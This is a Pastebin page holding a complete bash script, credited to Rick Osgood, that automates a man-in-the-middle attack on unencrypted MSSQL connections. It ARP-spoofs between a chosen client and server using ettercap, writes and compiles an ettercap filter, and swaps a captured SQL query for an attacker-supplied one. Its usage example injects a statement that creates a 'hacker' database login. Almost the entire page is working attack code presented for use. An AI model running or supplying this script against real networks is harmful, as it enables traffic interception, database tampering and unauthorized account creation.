Advertisement
anitian

Anitian SQL Inject MITM

Feb 5th, 2016
9,619
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.31 KB | None | 0 0
  1. #!/bin/bash
  2. #
  3. ####################################################################
  4. #
  5. # Written by Rick Osgood
  6. #
  7. # This script is designed to automate the process of hijacking an
  8. # MSSQL database connection. This script can be used to perform a
  9. # MITM attack between two IP addresses using ettercap and ARP
  10. # spoofing. You also submit an original SQL query and a new SQL
  11. # query. The script will create, compile, and load an ettercap
  12. # filter to replace the original SQL string with your new one.
  13. # This should work on any MSSQL conncetion that is not encrypted.
  14. #
  15. ####################################################################
  16.  
  17. args=("$@") #array to store command line arguments
  18.  
  19. # Set variable defalts
  20. SqlPort=1433
  21. ServerIP="NULL"
  22. ClientIP="NULL"
  23. FileName="NULL"
  24.  
  25. # Help function
  26. print_help(){
  27. echo "Usage: ./SQLInject.sh -o [original SQL query] -i [new SQL query] -s [MSSQL Server IP]
  28. -c [SQL Client IP]"
  29. echo ""
  30. echo "Example: ./SQLInject.sh -o \"SELECT * from Products WHERE ProductID=1;\" -i \"CREATE L
  31. OGIN hacker WITH PASSWORD=\"password01\";\" -s 10.0.1.20 -c 10.0.1.100"
  32. echo ""
  33. echo "This script creates an ettercap filter that will identify a SQL string"
  34. echo "and replace it with a new string. The script will then compile the filter"
  35. echo "and run ettercap with the filter loaded. Ettercap will perform an ARP"
  36. echo "spoofing attack against the specified IP addresses automatically. All you"
  37. echo "have to do is sit back and wait for the original query to be submitted."
  38. echo ""
  39. echo " --help"
  40. echo " Show this message."
  41. echo " -o"
  42. echo " Specify the original SQL string to be replaced."
  43. echo " -i"
  44. echo " Specify the new SQL string to be injected. This string must not"
  45. echo " longer than the original query string."
  46. echo " -s"
  47. echo " Specify the MSSQL server IP for ARP poison attack. May also use gateway IP"
  48. echo " -c"
  49. echo " Specify the SQL cient IP for ARP poison attack."
  50. echo " -f"
  51. echo " Specify the output filename for the ettercap filter."
  52. echo " -p"
  53. echo " Optional. Specifiy the MSSQL traffic port. Defaults to 1433."
  54. }
  55.  
  56. # If not enough arguments then quit
  57. if [ $# -lt "4" ]; then
  58. print_help
  59. exit 1
  60. fi
  61.  
  62. COUNTER=0 #Count from zero to number of arguments
  63. while [ $COUNTER -lt $# ]; do
  64. if [ "${args[$COUNTER]}" == "--help" ]; then
  65. print_help
  66. exit 0
  67.  
  68. elif [ "${args[$COUNTER]}" == "-o" ]; then
  69. COUNTER=$(($COUNTER+1))
  70. OldQuery=${args[$COUNTER]}
  71.  
  72. elif [ "${args[$COUNTER]}" == "-i" ]; then
  73. COUNTER=$((COUNTER+1))
  74. NewQuery=${args[$COUNTER]}
  75.  
  76. elif [ "${args[$COUNTER]}" == "-s" ]; then
  77. COUNTER=$((COUNTER+1))
  78. ServerIP=${args[$COUNTER]}
  79.  
  80. elif [ "${args[$COUNTER]}" == "-c" ]; then
  81. COUNTER=$((COUNTER+1))
  82. ClientIP=${args[$COUNTER]}
  83.  
  84. elif [ "${args[$COUNTER]}" == "-f" ]; then
  85. COUNTER=$((COUNTER+1))
  86. FileName=${args[$COUNTER]}
  87.  
  88. elif [ "${args[$COUNTER]}" == "-p" ]; then
  89. COUNTER=$((COUNTER+1))
  90. SqlPort=${args[$COUNTER]}
  91.  
  92. else
  93. echo "Error: Unknown argument \"${args[$COUNTER]}\""
  94. echo ""
  95. print_help
  96. exit 1
  97. fi
  98.  
  99. COUNTER=$(($COUNTER+1))
  100. done;
  101.  
  102. # Is anything missing?
  103. if [ "$ServerIP" == "NULL" ]; then
  104. echo "You must specify server IP!"
  105. exit 1
  106.  
  107. elif [ "$ClientIP" == "NULL" ]; then
  108. echo "You must specify client IP!"
  109. exit 1
  110.  
  111. elif [ "$FileName" == "NULL" ]; then
  112. echo "You must specify the file name for the ettercap filter!"
  113. exit 1
  114. fi
  115.  
  116. # Calculate length of injected SQL query
  117. length2=`echo $NewQuery | wc -m`
  118. length2=$((length2 - 1))
  119. echo "New string is $length2 bytes"
  120.  
  121. # Calculate length of original SQL query
  122. length1=`echo $OldQuery | wc -m`
  123. length1=$((length1 - 1))
  124. echo "Original string is $length1 bytes"
  125.  
  126. # What's the difference?
  127. difference=$((length1 - length2))
  128. echo "Difference is $difference bytes"
  129.  
  130. # If the new string is too long it won't work
  131. if [ $difference -lt 0 ]; then
  132. echo ""
  133. echo "New SQL query is longer than original! Quitting..."
  134. exit 0
  135. fi
  136.  
  137. temp=""
  138. for i in `seq 1 $difference`;
  139. do
  140. temp="$temp "
  141. done
  142. PaddedQuery="$NewQuery$temp"
  143. echo "PaddedQuery is \"$PaddedQuery\""
  144. echo ""
  145.  
  146. IFS=$'\n' # change separater to newline only. Required or the for loop skips spaces
  147.  
  148. echo "Converting original query to hex..."
  149. # Convert original query to hex string with NULL padding (How it appears over the wire)
  150. OldQueryHex=""
  151. for line in $(echo $OldQuery | sed -e 's/\(.\)/\1\n/g')
  152. do
  153. OldQueryHex="$OldQueryHex\x"
  154. temp=`echo $line | hexdump -C |head -n1 | awk -F" " {'print $2'} | awk {'print $1'}`
  155. OldQueryHex="$OldQueryHex$temp"
  156. OldQueryHex="$OldQueryHex\x00"
  157. done
  158.  
  159. echo "Converting new query to hex..."
  160. # Convert new query to hex string now.
  161. NewQueryHex=""
  162. for line in $(echo $PaddedQuery | sed -e 's/\(.\)/\1\n/g')
  163. do
  164. NewQueryHex="$NewQueryHex\x"
  165. temp=`echo $line | hexdump -C |head -n1 | awk -F" " {'print $2'} | awk {'print $1'}`
  166. NewQueryHex="$NewQueryHex$temp"
  167. NewQueryHex="$NewQueryHex\x00"
  168. done
  169.  
  170. echo "Writing ettercap filter now..."
  171.  
  172. # Start writing actual ettercap filter file
  173. echo "if (ip.proto == TCP && tcp.dst == $SqlPort) {" > $FileName
  174. echo " msg(\"SQL traffic discovered\");" >> $FileName
  175. echo " if (search(DATA.data,\"$OldQueryHex\")) {" >> $FileName
  176. echo " msg(\"Found our string!\");" >> $FileName
  177. echo " replace(\"$OldQueryHex\",\"$NewQueryHex\");" >> $FileName
  178. echo " msg(\"...and replaced it :)\");" >> $FileName
  179. echo " }" >> $FileName
  180. echo "}" >> $FileName
  181.  
  182. # Exeute etterfilter to create the compiled filter
  183. etterfilter $FileName -o $FileName.ef
  184.  
  185. # Execute ettercap and load the filter
  186. ettercap -T -q -F ./$FileName.ef -M ARP //$ServerIP// //$ClientIP//
  187.  
  188. echo ""
  189. echo "Completed Successfully!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement